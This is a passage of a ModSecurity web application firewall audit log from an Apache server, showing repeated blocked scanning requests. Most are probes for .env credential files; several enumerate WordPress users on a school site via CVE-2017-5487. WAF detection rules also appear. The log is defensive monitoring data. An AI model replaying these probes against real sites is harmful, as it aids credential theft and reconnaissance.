(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72a3400d-Z-- --55c6bf34-A-- [31/May/2025:02:15:00 +0700] aDoDtMYFzUaFKnNpI2DQEAAAAQk 103.236.140.4 32980 103.236.140.4 8181 --55c6bf34-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 165.227.173.41 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --55c6bf34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55c6bf34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748632500663617 874 (- - -) Stopwatch2: 1748632500663617 874; combined=356, p1=315, p2=0, p3=0, p4=0, p5=40, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55c6bf34-Z-- --59bddf34-A-- [31/May/2025:02:18:18 +0700] aDoEegYacg5Rp_mEAa0HtgAAAEM 103.236.140.4 37490 103.236.140.4 8181 --59bddf34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.243.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.243.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59bddf34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59bddf34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748632698697139 3064 (- - -) Stopwatch2: 1748632698697139 3064; combined=1362, p1=423, p2=910, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59bddf34-Z-- --5fa56a13-A-- [31/May/2025:02:37:20 +0700] aDoI8HC_Owo8zPtYGR2pqgAAAMc 103.236.140.4 35670 103.236.140.4 8181 --5fa56a13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.112.71.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.112.71.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5fa56a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fa56a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748633840525318 4398 (- - -) Stopwatch2: 1748633840525318 4398; combined=2188, p1=740, p2=1415, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fa56a13-Z-- --83bfed2e-A-- [31/May/2025:03:15:05 +0700] aDoRyR_L2Rte6DjSjWYjRgAAAIE 103.236.140.4 60072 103.236.140.4 8181 --83bfed2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.111.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.111.71 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --83bfed2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83bfed2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748636105414820 1506 (- - -) Stopwatch2: 1748636105414820 1506; combined=630, p1=574, p2=0, p3=0, p4=0, p5=56, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83bfed2e-Z-- --b999703f-A-- [31/May/2025:03:56:53 +0700] aDoblVbZTRMbIzLSWp58gQAAANQ 103.236.140.4 39026 103.236.140.4 8181 --b999703f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; zh-CN; KNT-UL10 Build/HUAWEIKNT-UL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Quark/3.0.2.943 Mobile Safari/537.36 Accept-Charset: utf-8 --b999703f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b999703f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748638613104912 808 (- - -) Stopwatch2: 1748638613104912 808; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b999703f-Z-- --a3924461-A-- [31/May/2025:04:38:08 +0700] aDolQFbZTRMbIzLSWp59YwAAAMs 103.236.140.4 41936 103.236.140.4 8181 --a3924461-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.24.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.24.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3924461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3924461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748641088352400 2631 (- - -) Stopwatch2: 1748641088352400 2631; combined=1332, p1=405, p2=897, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3924461-Z-- --9253d349-A-- [31/May/2025:05:23:53 +0700] aDov-Z3Kgs4r2wz12c5_1AAAAAc 103.236.140.4 46234 103.236.140.4 8181 --9253d349-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.9.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.9.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9253d349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9253d349-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748643833911719 2984 (- - -) Stopwatch2: 1748643833911719 2984; combined=1258, p1=436, p2=792, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9253d349-Z-- --57e8273b-A-- [31/May/2025:06:14:39 +0700] aDo73-g1nD2n5twq7Nsq9wAAAFY 103.236.140.4 49558 103.236.140.4 8181 --57e8273b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --57e8273b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57e8273b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748646879896490 764 (- - -) Stopwatch2: 1748646879896490 764; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57e8273b-Z-- --7628720e-A-- [31/May/2025:06:14:40 +0700] aDo74J3Kgs4r2wz12c6AuwAAAA4 103.236.140.4 49562 103.236.140.4 8181 --7628720e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7628720e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7628720e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748646880003034 682 (- - -) Stopwatch2: 1748646880003034 682; combined=280, p1=245, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7628720e-Z-- --82142a1c-A-- [31/May/2025:06:16:43 +0700] aDo8W1bZTRMbIzLSWp5_5wAAAM4 103.236.140.4 49686 103.236.140.4 8181 --82142a1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --82142a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82142a1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003092192 752 (- - -) Stopwatch2: 1748647003092192 752; combined=351, p1=312, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82142a1c-Z-- --39e5ae28-A-- [31/May/2025:06:16:43 +0700] aDo8W1bZTRMbIzLSWp5_6AAAANE 103.236.140.4 49690 103.236.140.4 8181 --39e5ae28-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --39e5ae28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e5ae28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003147756 640 (- - -) Stopwatch2: 1748647003147756 640; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e5ae28-Z-- --52240c1f-A-- [31/May/2025:06:16:43 +0700] aDo8W53Kgs4r2wz12c6AvwAAABQ 103.236.140.4 49694 103.236.140.4 8181 --52240c1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --52240c1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52240c1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003207601 644 (- - -) Stopwatch2: 1748647003207601 644; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52240c1f-Z-- --f2500b0a-A-- [31/May/2025:06:26:23 +0700] aDo-n1bZTRMbIzLSWp6AJgAAANE 103.236.140.4 50382 103.236.140.4 8181 --f2500b0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.169.97.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.169.97.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f2500b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2500b0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748647583047948 3182 (- - -) Stopwatch2: 1748647583047948 3182; combined=1434, p1=490, p2=911, p3=0, p4=0, p5=32, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2500b0a-Z-- --5d2e9c21-A-- [31/May/2025:06:28:55 +0700] aDo_N53Kgs4r2wz12c6A_gAAAAU 103.236.140.4 50514 103.236.140.4 8181 --5d2e9c21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5d2e9c21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d2e9c21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748647735373329 3582 (- - -) Stopwatch2: 1748647735373329 3582; combined=1562, p1=487, p2=1038, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d2e9c21-Z-- --9981f950-A-- [31/May/2025:06:46:48 +0700] aDpDaB_L2Rte6DjSjWYm2QAAAIc 103.236.140.4 51694 103.236.140.4 8181 --9981f950-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.233.84.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.233.84.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9981f950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9981f950-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748648808637722 2699 (- - -) Stopwatch2: 1748648808637722 2699; combined=1465, p1=444, p2=991, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9981f950-Z-- --cd0e195c-A-- [31/May/2025:08:33:19 +0700] aDpcX53Kgs4r2wz12c6DGgAAABQ 103.236.140.4 58848 103.236.140.4 8181 --cd0e195c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.111.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.111.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cd0e195c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0e195c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748655199063806 837 (- - -) Stopwatch2: 1748655199063806 837; combined=338, p1=301, p2=0, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0e195c-Z-- --cd0ab21d-A-- [31/May/2025:08:34:07 +0700] aDpcj53Kgs4r2wz12c6DIAAAAAQ 103.236.140.4 58882 103.236.140.4 8181 --cd0ab21d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.199.97.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.199.97.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd0ab21d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0ab21d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748655247104188 3410 (- - -) Stopwatch2: 1748655247104188 3410; combined=1462, p1=481, p2=949, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0ab21d-Z-- --740ca37c-A-- [31/May/2025:08:47:25 +0700] aDpfrR_L2Rte6DjSjWYnjAAAAI8 103.236.140.4 59656 103.236.140.4 8181 --740ca37c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.243.190.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.243.190.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --740ca37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --740ca37c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748656045384410 2814 (- - -) Stopwatch2: 1748656045384410 2814; combined=1245, p1=424, p2=791, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --740ca37c-Z-- --45eebd2e-A-- [31/May/2025:09:22:12 +0700] aDpn1J3Kgs4r2wz12c6EcwAAABE 103.236.140.4 33554 103.236.140.4 